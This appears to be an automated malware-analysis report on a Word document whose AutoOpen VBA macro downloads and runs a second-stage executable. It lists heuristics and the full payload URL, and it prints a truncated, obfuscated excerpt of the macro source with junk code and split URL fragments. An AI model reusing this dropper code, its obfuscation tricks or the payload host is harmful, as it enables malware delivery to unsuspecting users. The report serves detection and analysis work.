Verdict: MALICIOUS (Risk Score: 310)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen subroutine. The macro uses CreateObject and Shell calls to download a second-stage executable from http://deliverytrackingsytem.com/update/close/files/doru1706_soft_new.exe and execute it. Together, these indicators strongly suggest dropper functionality.
Heuristics (9)

- ClamAV: Doc.Dropper.Agent-6995452-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6995452-0
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script: `Shell iijbjq, sffgi`
- VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `jbio.Write fchsyay.responseBody`
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Set fchsyay = CreateObject("Microsoft.XMLHTTP")`
- Payload URL assembled from a Chr()/Asc() string expression (1 URL) [high] OLE_VBA_EXPR_DROPPER_URL: A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results, often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://deliverytrackingsytem.com/update/close/files/doru1706_soft_new.exe (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 116466 bytes | bbf9a6af909f6b3b78e35b6e72efc91f1e97992cf07a6cde641c75e953c848a4 |
Preview script (first 1,000 lines of the extracted script, flattened by extraction; the listing is truncated):
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() Dim oxryqvi As String oxryqvi = "-22377" Dim sfbnse0 As Integer sfbnse0 = -14339 For E = 32 To 33 anzuziu = 8881 Next E v = -3178 uo = -57496 qae = (v Or uo) For bb = 23 To 23 natsljp = bb Next bb For ywpi = 70 To 71 vedlze = -13885 Next ywpi jco = 24437 j = -40637 ou = (jco Or j) Dim hxclzhs As Double hxclzhs = -52891.45535 qy = 50128 wm = 23791 mh = (qy Xor wm) y = -19612 wx = -39249 eko = Not (y > wx) Dim mzizq As Double mzizq = 21365.60324 Dim tdpdkka As Boolean tdpdkka = False Dim fcboe51 As Double fcboe51 = 64911.18128 For czi = 48 To 49 knmiec86 = -3464 Next czi Dim eowc12 As Double eowc12 = -23153.58745 For g = 53 To 53 livgmr69 = g Next g wdtcuz = ".ex" Dim bpwgtwuoa As Double bpwgtwuoa = 26033.29571 mzkm = 26641 k = 1821 miau = Not (mzkm > k) bav = 48003 iuzy = -31542 axdi04 = Not (bav > iuzy) ybwl = 46793 a = -34807 f = (ybwl Or a) ozd = 53573 Z = 6889 yug = (ozd Xor Z) For nqe = 46 To 46 wiytpe = nqe Next nqe Dim szrfoua As String szrfoua = "18831" For yai = 46 To 49 ifphlytz = ifphlytz + yai Next yai fua = 56926 trt = -18671 rhu = (fua Xor trt) wathn = 52877 eii = (Not wathn) For cnnl = 74 To 74 gboeiq = -3161 Next cnnl b = -9656 aj = (Not b) Dim aoeyo aoeyo = 18990 d = -58509 E = -618 uqi = (d Xor E) agm = 51936 wga = 42871 ekf = Not (agm > wga) Dim aoewqb aoewqb = 11596 fegkaa = "blic\y" Dim yelvlv yelvlv = -12366 For cpa = 58 To 59 dzemldp8 = "hslmgvuituwekpoy60" Next cpa Dim jheunl As String jheunl = "hg" dy = 6136 w = -15808 bv = (dy Xor w) ve = 39902 uia = -4706 s = (ve Xor uia) For co = 60 To 63 zxehqb10 = 11843 Next co brvf12 = -37099 kqbc = -25986 a = Not (brvf12 > kqbc) For o = 35 To 36 uotme80 = o Next o idt = 39849 d = 
31102 ue = (idt Xor d) Dim txrriy44 As Double txrriy44 = -66626.10743 eficvo00 = "exe" yarl = -38915 bt = 55560 i = Not (yarl > bt) b = -12605 ayi = 21434 i = (b Or ayi) Dim aioptau aioptau = -9819 Dim eafafi eafafi = 17741 For yyn = 99 To 99 orwaya = "aoncpmuxi" Next yyn qou = 60385 cbjo = (Not qou) uzchzs = -59367 ixngdi84 = -14807 uncyy24 = Not (uzchzs < ixngdi84) Dim ohyh ohyh = -6117 dugl = -51851 iy = 13788 ik = (dugl Or iy) E = -57797 d = -45725 bvsh = (E Xor d) ehji7 = -25553 sm = -29058 iua = (ehji7 Or sm) Dim etpay etpay = -1797 u = -31143 fpx = 20169 a = Not (u < fpx) aiigl = 13238 rku = 59781 un = Not (aiigl < rku) For u = 97 To 98 oabf = u Next u evcuyo = "u1706_" For ui = 82 To 84 nyapvmd = "guujfykuygkdx" Next ui olsd = -23361 i = (Not olsd) For wenx = 23 To 24 bisw = wenx Next wenx For ov = 34 To 36 ytckou7 = "uomhe" Next ov For ta = 62 To 63 beat = ta Next ta o = 40945 liw = 45216 qg = (o Or liw) For wie = 32 To 33 tjiamh = tjiamh + wie Next wie otm = 25605 i = (Not otm) Dim rbbruu36 rbbruu36 = -30090 gxyz = -29251 qv = -6166 alr = (gxyz Xor qv) cg = 3884 cgi = 18715 i = (cg Or cgi) For sy = 33 To 33 zhebkbzo = "gwiaitl" Next sy ytz = 18802 qwfx = -32434 aua = (ytz Xor qwfx) For ayu = 59 To 60 xsujcdm = xsujcdm + ayu Next ayu For aisw = 26 To 26 icvgtgllm = icvgtgllm + aisw Next aisw ospa = "ew." 
Dim yanlre yanlre = -18321 For ual = 27 To 27 quyoay = quyoay + ual Next ual Dim fnncgli As Integer fnncgli = 9503 zee = -53411 Z = -32048 xboxu = Not (zee > Z) o = 31014 jfei = 61095 ea = (o Or jfei) bdk = -20786 qisk = -27747 E = (bdk Or qisk) Dim yueiy6 As String yueiy6 = "edzunv25" Dim rchuy85 As Integer rchuy85 = 25505 For yhbm = 99 To 102 ybiipxo5 = "aomliatcmtiu88" Next yhbm ec = -66564 ga = -62620 iey = (ec Xor ga) iay = -41566 de = 18982 ne = (iay Or de) i = 13307 uubm = 5392 aid = (i Or uubm) vzeu = -49097 eww = 43782 yudj = (vzeu Xor eww) u = -51602 qp = -35522 awtv = Not (u < qp) vou = -37064 xct = 57993 dcn = Not (vou > xct) oeuuum1 = "ngsyt" uo = -61521 tkghl = 16846 wzbwf = (uo Xor tkghl) Dim hiyoar60 As Integer hiyoar60 = -26886 xjnn = 24148 ik = 24145 woa = (xjnn Or ik) c = -30851 h = 15871 y = (c Xor h) ma = 20487 c = -4798 qjkpf = (ma Or c) For d = 11 To 11 obqyoa = "obxtdezf" Next d ioy = 7425 wnedi = 59263 fspip = Not (ioy > wnedi) hvo = -12175 uj = -22998 av = Not (hvo > uj) For E = 70 To 72 sadibh = -16712 Next E uuay = "get" mjqn = -11300 yzhfxi = 460 eijjo25 = Not (mjqn > yzhfxi) pjsg = -53553 zof = 44046 ia = Not (pjsg > zof) Dim ouzkrvr As Integer ouzkrvr = 16265 For ay = 55 To 57 ngoipkfr = ay Next ay For igwe = 63 To 64 gvljqujtm4 = gvljqujtm4 + igwe Next igwe For u = 48 To 50 exrbdk = 13498 Next u uelz = -45435 h = 61706 ke = (uelz Xor h) Dim uevta As Double uevta = 32920.49698 i = 56837 trgjy = 21464 oe = Not (i > trgjy) E = -10693 uxea = 2659 jid = Not (E > uxea) h = -54188 i = (Not h) eofue4 = "es/dor" yve = -20210 oly = 53987 uo = (yve Or oly) Dim puzgqi62 As Double puzgqi62 = -55732.2581 Dim oijmbe As Boolean oijmbe = True unafn = -43926 vtshmy = -186 moba = Not (unafn < vtshmy) For yjq = 94 To 95 voyukn = -5760 Next yjq Dim oufktqul As Boolean oufktqul = True Dim oetvamo63 As Boolean oetvamo63 = False For ea = 19 To 19 oeyyo = oeyyo + ea Next ea For t = 25 To 27 hlahko8 = t Next t For q = 99 To 99 szyttjfu = q Next q ou = 3863 
kti = 33655 oia = (ou Xor kti) egiydr = "em.co" For i = 72 To 72 hcipeuh = "erdaeougtsbu" Next i For ind = 51 To 53 yaca = "qfspxcbkwl" Next ind a = 32815 aou = (Not a) Dim jrjbnlletw As Integer jrjbnlletw = 27415 ojq = 30681 hahjmb = (Not ojq) Dim oxpeu As Integer oxpeu = -21202 Dim yojtyt As Double yojtyt = -34491.39169 Dim urme As Integer urme = -4163 u = -12156 k = -24196 heff = (u Xor k) Dim sooldip As Integer sooldip = 28548 aoj = -29477 wlni = 18680 r = (aoj Or wlni) For l = 41 To 42 aoqrl1 = l Next l For iqa = 81 To 82 eiend = iqa Next iqa oua = 14984 kkqn = 7372 qovy8 = Not (oua < kkqn) Dim jrcyeau As Double jrcyeau = -54246.23568 iluo = "livery" Dim pcgcck pcgcck = -26489 wcj = -64180 dmas = -15304 fopa = Not (wcj < dmas) mrd = 15517 eu = 7338 ky = (mrd Or eu) Dim uoxqoz uoxqoz = -17186 tj = -27115 usla = -64719 qca = (tj Or usla) ui = -36527 b = 375 epqa = (ui Or b) jrgc = 4744 krbd = -30638 cqsz = (jrgc Or krbd) For fbo = 44 To 46 lelnmn28 = "ilwiaae43" Next fbo For gvuu2 = 12 To 12 mxizczf = "aoqrjhteeoeo" Next gvuu2 wfyqvgsee = "tracki" kqsci = -48010 wjglc = (Not kqsci) For ioe = 69 To 71 ilctfy = "fwieuukqjfrarv55" Next ioe elt = -50073 E = -61002 o = (elt Or E) oyy = -37089 sxoro = 35483 ui = Not (oyy < sxoro) sgmq = 36590 uoo = (Not sgmq) Dim eyvqve04 As Integer eyvqve04 = 32658 Dim cbyvds As Boolean cbyvds = True Dim uxrqtcky As Integer uxrqtcky = -20689 yj = -46581 q = -50197 uzhv = (yj Xor q) Dim ufziwo93 ufziwo93 = 10733 Dim lodo As Double lodo = 15041.2796 Dim fkiooy fkiooy = -25181 Dim ymwtnq As Integer ymwtnq = -8304 For yo = 31 To 31 rwwtao6 = rwwtao6 + yo Next yo Dim iecxcey As Integer iecxcey = -17796 For ywq = 37 To 38 wfcknkpci = 9642 Next ywq mqiox = "gwxb" hh = -10387 eau = 30488 ezqo = (hh Or eau) Dim eueuzzw eueuzzw = -10850 qzlj = -54800 u = (Not qzlj) Dim uylriuo As Integer uylriuo = 1 ia = 2190 oew = (Not ia) Dim ooovgezs As Boolean ooovgezs = False a = -50902 qww = 53478 ewma = (a Or qww) Dim ihflfmqhz As Integer ihflfmqhz = 
-19834 E = -929 fletb = -48294 kvbo92 = (E Or fletb) uua = -6514 ooa = (Not uua) For hze = 67 To 69 pkkgue = -12355 Next hze For zknhb = 54 To 54 yfeyic7 = 10803 Next zknhb ygj = 33284 oys = -64757 yy = Not (ygj < oys) For eo = 11 To 11 utlchrf86 = eo Next eo For o = 60 To 60 jwgjmmnj68 = jwgjmmnj68 + o Next o iua = -19929 ynhy = 25649 iunt3 = (iua Or ynhy) yy = -24918 upi = (Not yy) yipxjse2 = "/clos" o = 66131 qrysy0 = 60430 lgegcq = Not (o < qrysy0) kug = 45156 j = 24434 xen = Not (kug > j) Dim yoou yoou = 21917 lntl78 = 42971 o = 9427 askld = Not (lntl78 > o) a = -4206 vgu = -65613 nd = (a Xor vgu) hiy = -41246 tw = (Not hiy) For hsmx98 = 14 To 16 vaoou = hsmx98 Next hsmx98 i = -25564 nk = 6702 eir = (i Or nk) asjy = -26219 tr = -11602 u = (asjy Xor tr) edy = -64748 wt = 44905 i = Not (edy < wt) Dim uake uake = -26312 ayiwk04 = -35241 aowp = -30203 fmdjt91 = Not (ayiwk04 > aowp) oeoa = "m/up" yjcu = -49175 vmanda = (Not yjcu) For odzy = 59 To 60 ccorq = ccorq + odzy Next odzy yyxq = -32636 URL = 57034 yyi = (yyxq Or URL) nh = -59499 s = -15784 aii = (nh Xor s) y = 37141 ft = 41430 ctdmp = (y Xor ft) oy = -36831 vmu = -64548 omprma = Not (oy < vmu) Dim knizmf As Boolean knizmf = False Dim uikjdq As Boolean uikjdq = False epdynr = -32179 svfdh = (Not epdynr) For ie = 54 To 56 uvflep = ie Next ie hdxwj = 23347 ctfc = -36514 ajd = (hdxwj Or ctfc) vyv = 46449 vlvko1 = -32794 busg = (vyv Xor vlvko1) s = 44884 phm = -32922 ieuhr7 = Not (s < phm) uayfy = "C:\Use" ou = -1326 tryu = (Not ou) For b = 78 To 78 irsauu = b Next b omkl = -10260 aogs = (Not omkl) For i = 76 To 78 fuso = fuso + i Next i osgq85 = -60895 E = (Not osgq85) Dim gmnitkhjdm As Integer gmnitkhjdm = 4633 eesm = -19791 yii = -66267 lkd = (eesm Or yii) cuzg = 53457 mnp = 23939 nrv = (cuzg Xor mnp) fs = -11505 zc = -5374 yu = (fs Xor zc) yrmuo = "soft_n" Dim evkxpu06 evkxpu06 = 13423 g = -34440 wq = (Not g) yye = -2812 taur = -62553 o = Not (yye > taur) Dim jgbrzzbt jgbrzzbt = 23731 Dim qlnqz As Boolean 
qlnqz = True yi = 4207 y = (Not yi) ey = -42697 o = (Not ey) da = 36921 no = 61433 ae = Not (da > no) yfc = -66328 aocq = -55139 E = (yfc Or aocq) For um = 46 To 47 yafvvhi1 = "axrwyizuxobwoaoq" Next um dq = -21656 iecc5 = -50800 woa = (dq Or iecc5) aicrioe = "date" y = 65900 ea = 49464 jad = Not (y > ea) For o = 22 To 22 huyh = "hudqopzzoljcx" Next o Dim aauyu aauyu = 4035 euy = -20175 ug = 17400 bth = Not (euy < ug) Dim udsybz udsybz = 9323 uuie = -53800 up = (Not uuie) For egy = 44 To 46 aectic = aectic + egy Next egy am = 54004 iifx18 = -19051 zukmk = Not (am > iifx18) qruf = 22347 buck = 46381 blke = (qruf Xor buck) For lm = 53 To 53 eqny = eqny + lm Next lm a = 58513 h = -37880 Z = (a Xor h) For y = 23 To 24 yete = yete + y Next y iwb = -64127 a = -64135 tze = (iwb Or a) xmz = -54737 q = -36379 u = (xmz Or q) For ubv = 97 To 99 evvhi = ubv Next ubv For kvv = 31 To 32 eggngfa62 = eggngfa62 + kvv Next kvv eiittv = "e/fil" qbq = 4112 ay = (Not qbq) ozq = -17019 ja = -45169 u = (ozq Or ja) Dim hdbam90 As String hdbam90 = "htzeiexsoz" sw = -5838 bau = (Not sw) Dim woynwa woynwa = -16914 ic = 3466 aao = 63162 nr = (ic Or aao) yf = -33279 tf = 20796 lfsa = (yf Xor tf) wyf = 10189 dk = -6414 u = (wyf Or dk) o = 27780 omv = -23600 yir = Not (o < omv) For imbe4 = 25 To 27 oidjpxl = -4801 Next imbe4 ncu = -37421 cey = 3111 guo = (ncu Xor cey) For jxv = 40 To 40 wqwseo = -5016 Next jxv euvernu = "itrf" For ook = 92 To 92 ikoebv = ikoebv + ook Next ook For g = 58 To 59 srfcrblz = g Next g x = -7164 ia = 64082 auyvh = Not (x < ia) iqt = -23362 oiqk = -33351 ay = (iqt Or oiqk) rwjwu = 58835 r = -24290 iii = (rwjwu Xor r) Dim aiqa4 As String aiqa4 = "sarfegjyorpn5" Dim kdnommi kdnommi = 21963 Dim bpiahcozf bpiahcozf = 16280 u = -60287 kli = 31125 oul = Not (u < kli) Dim puijle5 As String puijle5 = "13023" mnkd = -14707 se = 16577 ii = (mnkd Xor se) Dim appvv7 appvv7 = -25399 kn = 31015 o = -17043 vvkhg = Not (kn > o) jke = 46423 quqs0 = 27699 h = (jke Xor quqs0) Dim ooyk3 
ooyk3 = 6026 ca = 63722 stclg = -34915 evx = (ca Or stclg) Dim fnahqm fnahqm = -25741 ou = 31312 kk = 13665 un = (ou Xor kk) vvkbye = "rs\Pu" Dim qmabqisi8 As String qmabqisi8 = "fygid" For i = 47 To 50 stakggu60 = i Next i i = -12072 u = 49076 dz = (i Or u) Dim sxwwau0 sxwwau0 = -5187 For oy = 65 To 65 auuam = oy Next oy vzdxau = -1408 dcjb = 37893 E = Not (vzdxau > dcjb) o = 30956 vr = 29062 E = (o Or vr) xt = -45086 dqcbb = -54751 y = Not (xt < dqcbb) imu = -64354 vei = -40553 sm = Not (imu < vei) Dim yceett yceett = -10255 For vvyrc = 14 To 17 yamwyyi = yamwyyi + vvyrc Next vvyrc ia = 19783 i = 38092 d = (ia Or i) For vx = 39 To 40 vhmhfqy = vx Next vx efbhpe = -62209 odsq = 48368 ra = Not (efbhpe < odsq) nnyyy = -11246 E = (Not nnyyy) akwaafr = "http:/" Dim zhiye As String zhiye = "a" Dim uwayyy40 As Boolean uwayyy40 = False zi = 249 sd = (Not zi) vxu = -35734 ieua = 55306 ueyo = Not (vxu < ieua) Dim fhabqo09 As Boolean fhabqo09 = True yq = -41739 u = -62896 beo = (yq Or u) yt = -28601 hxeu = -46654 pps = (yt Xor hxeu) For eonz = 29 To 31 bvuyjgn = bvuyjgn + eonz Next eonz For pza = 99 To 102 zeardhrgs = "ewqoawweyyeqi" Next pza Dim ineugml ineugml = -22187 Dim fkpevu As Integer fkpevu = -19353 r = 11443 ayvl = 7998 sjxd = (r Xor ayvl) For ueo = 66 To 69 ryycznz87 = ueo Next ueo mx = 57206 ixt = -47316 w = (mx Xor ixt) q = -47479 eu = 16589 xj = (q Or eu) inzqms = "/de" Dim obyykd obyykd = -15011 ol = -38651 ctyys = -55966 ncsjw = Not (ol > ctyys) Dim tvegxcx9 As String tvegxcx9 = "-29670" For mv = 32 To 34 fesdea = 4101 Next mv For ob = 40 To 40 zjhurwq = -3877 Next ob rmhn30 = -26489 eae = 2863 rn = (rmhn30 Xor eae) yy = 16732 y = -32849 af = (yy Or y) dyoo = 52192 uovz = (Not dyoo) iahv25 = 61283 oob = (Not iahv25) ppe = -14612 i = -22426 vri = (ppe Xor i) Dim boxxuumc As Boolean boxxuumc = True g = -55123 io = 62096 apa = (g Xor io) For vby = 26 To 28 wpscqe = wpscqe + vby Next vby ha = 3816 vlz = 14235 n = (ha Xor vlz) Dim hoeuyo0 hoeuyo0 = 16617 For dgr 
= 92 To 92 zmkgattov = dgr Next dgr asuqscg = "e" For cvu = 91 To 92 uizupvkg = "gmwuo" Next cvu For y = 63 To 64 vzuoibho9 = -17274 Next y For xntt = 78 To 80 ceqssjdq98 = xntt Next xntt For eqz = 97 To 98 ejymcjp = ejymcjp + eqz Next eqz For uy = 69 To 69 uuyy1 = uy Next uy Dim gnbckjmr gnbckjmr = 7256 For u = 80 To 82 epnpaxy = 5357 Next u …